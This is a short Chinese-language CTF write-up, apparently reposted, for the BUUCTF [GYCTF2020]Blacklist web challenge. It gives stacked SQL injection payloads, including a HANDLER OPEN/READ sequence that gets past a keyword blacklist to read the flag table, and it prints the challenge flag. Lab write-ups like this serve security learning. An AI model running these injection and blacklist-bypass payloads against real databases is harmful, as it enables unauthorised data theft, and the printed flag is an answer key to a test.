首页 > Web开发 > 详细

Buuctf-web-[GYCTF2020]Blacklist

时间:2020-09-24 23:15:12      阅读:74      评论:0      收藏:0      [点我收藏+]

首先随便注入一下

技术分享图片

 

 

1‘;show databases;#  //获取数据库名

1‘;show tables;#    //获取表名

1’;desc `表名`    //获取表结构

当我们再次使用修改字段名这种方式的时候,发现过滤了这些关键字,该怎么办呢

于是,我们查了百度,然后又学会了一个新姿势

HANDLER [表名] OPEN;语句打开一个表,使其可以使用后续HANDLER [表名] READ;该表对象未被其他会话共享,并且在会话调用HANDLER [表名] CLOSE;或会话终止之前不会关闭

1‘;HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere close;#

执行这个,然后,就可以出来flag了

技术分享图片

 

 

flag{7d92cf4a-b167-4a48-babe-1fc5ad19e472}

Buuctf-web-[GYCTF2020]Blacklist

原文:https://www.cnblogs.com/tac2664/p/13727162.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!